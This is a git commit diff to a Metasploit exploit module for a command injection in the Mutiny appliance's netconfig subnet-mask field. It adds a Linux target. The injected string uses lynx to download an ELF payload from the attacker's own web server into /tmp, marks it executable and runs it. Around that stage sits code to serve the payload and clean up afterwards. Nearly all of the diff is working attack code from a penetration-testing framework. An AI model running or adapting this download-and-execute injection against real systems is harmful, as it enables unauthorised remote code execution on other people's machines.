added linux native target

jvazquez-r7 · jvazquez-r7 · commit fdd7c375ada7 · 2013-03-07T19:12:25.000+01:00
diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -11,6 +11,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer
+	include Msf::Exploit::EXE
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -37,21 +39,37 @@ def initialize(info = {})
 					['URL', 'http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html']
 				],
 			'Privileged'     => true,
+			'Platform'       => [ 'unix', 'linux' ],
 			'Payload'        =>
 				{
 					'DisableNops' => true,
-					'Space'       => 4000,
-					'Compat'      =>
+					'Space'       => 4000
+				},
+			'Targets'        =>
+				[
+					[ 'Unix CMD',
 						{
-							'PayloadType' => 'cmd',
-							'RequiredCmd' => 'generic python',
+							'Arch' => ARCH_CMD,
+							'Platform' => 'unix',
+							#'Payload'        =>
+							#	{
+							#		'Compat'   =>
+							#			{
+							#				'PayloadType' => 'cmd',
+							#				'RequiredCmd' => 'python'
+							#			}
+							#	},
 						}
-				},
-			'Platform'       => 'unix',
-			'Arch'           => ARCH_CMD,
-			'Targets'        => [[ 'Automatic', { }]],
+					],
+					[ 'Linux Payload',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
 			'DisclosureDate' => 'Oct 22 2012',
-			'DefaultTarget' => 0))
+			'DefaultTarget' => 1))
 
 		register_options(
 			[
@@ -65,19 +83,94 @@ def peer
 		"#{rhost}:#{rport}"
 	end
 
+	def lookup_lhost()
+		# Get the source address
+		if datastore['SRVHOST'] == '0.0.0.0'
+			Rex::Socket.source_address('50.50.50.50')
+		else
+			datastore['SRVHOST']
+		end
+	end
+
 	def on_new_session(session)
-		return unless @netmask_eth0
-		print_status("#{peer} - Restoring Network information")
+		cmds = []
 		cmds = [
 			%Q|echo #{@netmask_eth0} > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
 			%Q|tr -d "\\n\\r" < /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak|,
 			%Q|mv -f /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
 			%Q|sed -e s/NETMASK=.*/NETMASK=#{@netmask_eth0}/ ifcfg-eth0 > ifcfg-eth0.bak|,
 			%Q|mv -f ifcfg-eth0.bak ifcfg-eth0|,
 			%Q|/etc/init.d/network restart|
-		]
-		session.shell_command_token(cmds.join(" ; "))
-		print_good("#{peer} - Network information restored")
+		] unless not @netmask_eth0
+		cmds << %Q|rm /tmp/#{@elfname}.elf| unless target.name =~ /CMD/
+
+		print_status("#{peer} - Restoring Network Information and Cleanup...")
+		begin
+			session.shell_command_token(cmds.join(" ; "))
+		rescue
+			print_error("#{peer} - Automatic restore and cleanup didn't work, please use these commands:")
+			cmds.each { |cmd|
+				print_warning(cmd)
+			}
+		end
+		print_good("#{peer} - Restoring and Cleanup successful")
+	end
+
+	def start_web_service
+		print_status("#{peer} - Setting up the Web Service...")
+
+		if datastore['SSL']
+			ssl_restore = true
+			datastore['SSL'] = false
+		end
+
+		resource_uri = '/' + @elfname + '.elf'
+		service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
+
+		print_status("#{peer} - Starting up our web service on #{service_url} ...")
+		start_service({'Uri' => {
+			'Proc' => Proc.new { |cli, req|
+				on_request_uri(cli, req)
+			},
+			'Path' => resource_uri
+		}})
+		datastore['SSL'] = true if ssl_restore
+
+		return service_url
+	end
+
+	# wait for the data to be sent
+	def wait_linux_payload
+		print_status("#{peer} - Waiting for the victim to request the ELF payload...")
+
+		waited = 0
+		while (not @elf_sent)
+			select(nil, nil, nil, 1)
+			waited += 1
+			if (waited > datastore['HTTP_DELAY'])
+				fail_with(Exploit::Failure::Unknown, "Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+			end
+		end
+
+		#print_status("#{peer} - Giving time to the payload to execute...")
+		#select(nil, nil, nil, 20) unless session_created?
+
+		print_status("#{peer} - Shutting down the web service...")
+		stop_service
+	end
+
+	# Handle incoming requests from the target
+	def on_request_uri(cli, request)
+		vprint_status("#{peer} - on_request_uri called, #{request} requested")
+
+		if (not @elf_data)
+			print_error("#{peer} - A request came in, but the ELF archive wasn't ready yet!")
+			return
+		end
+
+		print_good("#{peer} - Sending the ELF payload to the target...")
+		@elf_sent = true
+		send_response(cli, @elf_data)
 	end
 
 	def check
@@ -135,8 +228,22 @@ def exploit
 		end
 
 		print_status("#{peer} - Exploiting Command Injection...")
-		injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
-		injection << "; #{payload.encoded}"
+
+		if target.name =~ /CMD/
+			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
+			injection << "; #{payload.encoded}"
+		else
+			print_status("#{peer} - Generating the ELF Payload...")
+			@elf_data = generate_payload_exe
+			@elfname = Rex::Text.rand_text_alpha(3+rand(3))
+			service_url = start_web_service
+			injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
+			injection << "; lynx -source \"#{service_url}\" > /tmp/#{@elfname}.elf"
+			injection << "; chmod +x /tmp/#{@elfname}.elf"
+			injection << "; /tmp/#{@elfname}.elf"
+
+		end
+
 		send_request_cgi({
 			'method'    => 'POST',
 			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
@@ -151,7 +258,13 @@ def exploit
 				"staticRouteNetmask" => static_route_netmask || rand_text_alpha(5 + rand(3)),
 				"staticRouteGateway" => static_route_gateway || rand_text_alpha(5 + rand(3))
 			}
-		})
+		}, 1)
+
+		if target.name =~ /Linux Payload/
+			wait_linux_payload
+		end
 	end
 
+
+
 end
